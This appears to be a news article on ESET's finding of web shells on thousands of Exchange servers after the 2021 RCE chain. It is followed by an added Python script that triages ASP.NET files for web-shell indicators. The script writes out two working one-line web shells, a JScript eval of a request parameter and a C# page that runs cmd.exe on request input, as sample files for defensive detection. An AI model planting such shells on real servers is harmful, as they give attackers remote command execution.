During the first week of March 2021, Microsoft released patches for Microsoft Exchange Server 2013, 2016, and 2019, addressing a pre-authentication remote code execution vulnerability chain that let attackers take over any reachable Exchange server without valid account credentials. ESET announced that it had detected web shells on more than 5,000 email servers.
5,000 servers in over 115 countries were flagged
ESET announced that shortly after Microsoft released its patch, it noticed many more threat actors, including Tonto Team and Mikroceen, scanning and compromising Exchange servers. ESET also stated that almost all of these APT groups are interested in espionage.
According to ESET’s announcement, web shells were flagged on over 5,000 unique servers in over 115 countries. The company identified more than 10 different threat actors that likely leveraged the recent Microsoft Exchange RCE to install implants on victims’ email servers. ESET also stated,
“Our ongoing research shows that not only Hafnium has been using the recent RCE vulnerability in Exchange, but that multiple APTs have access to the exploit, and some even did so prior to the patch release. It is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later.
It is now clearly beyond prime time to patch all Exchange servers as soon as possible. Even those not directly exposed to the internet should be patched because an attacker with low, or unprivileged, access to your LAN can trivially exploit these vulnerabilities to raise their privileges while compromising an internal (and probably more sensitive) Exchange server, and then move laterally from it.”
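The web shells ESET describes are the first thing an incident responder would hunt for on an Exchange server. As an added example, not part of the article or of ESET’s research, the following Python script builds a constructed directory tree imitating an Exchange front-end layout and then triages ASP.NET files on indicators common to one-line web shells (script evaluation of request parameters, process spawning). The directory names, sample files, indicator list and weights are all assumptions for illustration; they are not ESET’s detections or Microsoft’s published indicators.

```python
"""Heuristic web-shell triage for ASP.NET files (added example, assumptions labelled)."""
import re
import tempfile
from pathlib import Path

# File types that IIS/ASP.NET will execute server-side.
WEB_EXTENSIONS = {".aspx", ".asmx", ".ashx", ".asax", ".ascx"}

# (regex, weight): indicators of code that executes attacker-supplied input.
# Weights and threshold are an assumption chosen for this example, not a standard.
INDICATORS = [
    (re.compile(r"\beval\s*\(", re.IGNORECASE), 3),
    (re.compile(r"\bExecute\s*\(", re.IGNORECASE), 3),
    (re.compile(r"\bRequest\s*(?:\.\s*(?:Item|Form|QueryString|Params)\b|\[)", re.IGNORECASE), 2),
    (re.compile(r'"unsafe"', re.IGNORECASE), 3),
    (re.compile(r"ProcessStartInfo|Process\.Start", re.IGNORECASE), 2),
    (re.compile(r"cmd\.exe|powershell", re.IGNORECASE), 2),
    (re.compile(r'Language\s*=\s*"JScript"', re.IGNORECASE), 1),
]
THRESHOLD = 5


def score_content(text: str) -> tuple[int, list[str]]:
    """Return the summed weight of matching indicators and the patterns that hit."""
    score, hits = 0, []
    for pattern, weight in INDICATORS:
        if pattern.search(text):
            score += weight
            hits.append(pattern.pattern)
    return score, hits


def scan_tree(root) -> list[dict]:
    """Walk root, score every server-side web file, return findings above THRESHOLD."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole sweep
        score, hits = score_content(text)
        if score >= THRESHOLD:
            findings.append({"path": str(path), "score": score, "hits": hits,
                             "size": path.stat().st_size})
    return sorted(findings, key=lambda f: -f["score"])


def suspicious_basenames(root) -> list[str]:
    """Convenience wrapper: sorted file names of everything scan_tree flagged."""
    return sorted(Path(f["path"]).name for f in scan_tree(root))


def build_sample_tree() -> str:
    """Create a constructed directory layout with one benign page and two sample shells.

    Paths mimic an Exchange front-end layout but are an assumption for the demo.
    """
    root = tempfile.mkdtemp(prefix="exchange_web_shell_demo_")
    owa = Path(root, "FrontEnd", "HttpProxy", "owa", "auth")
    owa.mkdir(parents=True)
    # Benign: a normal code-behind page with no dynamic evaluation.
    (owa / "logon.aspx").write_text(
        '<%@ Page Language="C#" Inherits="Microsoft.Exchange.HttpProxy.LogonPage" %>\n'
        '<html><body><form runat="server">...</form></body></html>\n')
    # Constructed sample shell: evaluates a request parameter as script.
    (owa / "cmd.aspx").write_text(
        '<%@ Page Language="JScript" %>\n'
        '<% eval(Request.Item["code"], "unsafe"); %>\n')
    client = Path(root, "inetpub", "wwwroot", "aspnet_client")
    client.mkdir(parents=True)
    # Constructed sample shell: spawns cmd.exe with a request parameter.
    (client / "proc.aspx").write_text(
        '<%@ Page Language="C#" %>\n'
        '<% var p = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c " + Request["c"]);\n'
        '   System.Diagnostics.Process.Start(p); %>\n')
    return root


if __name__ == "__main__":
    demo_root = build_sample_tree()
    for finding in scan_tree(demo_root):
        print(f"{finding['score']:>2}  {finding['path']}  ({', '.join(finding['hits'])})")
```

Point `scan_tree` at the real web roots instead of the constructed tree to use it for triage; tune `THRESHOLD` downward if you would rather review a few false positives (legitimate pages that call `Execute(`) than miss a terse shell, and treat any flagged file whose creation time post-dates the last known-good deployment as a priority for review.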